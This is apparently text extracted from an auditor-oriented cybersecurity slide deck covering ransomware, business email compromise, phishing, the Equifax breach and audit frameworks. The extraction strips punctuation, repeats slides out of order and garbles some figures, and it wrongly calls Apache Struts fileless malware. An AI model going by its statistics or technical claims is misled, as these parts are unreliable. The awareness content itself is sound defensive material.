RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
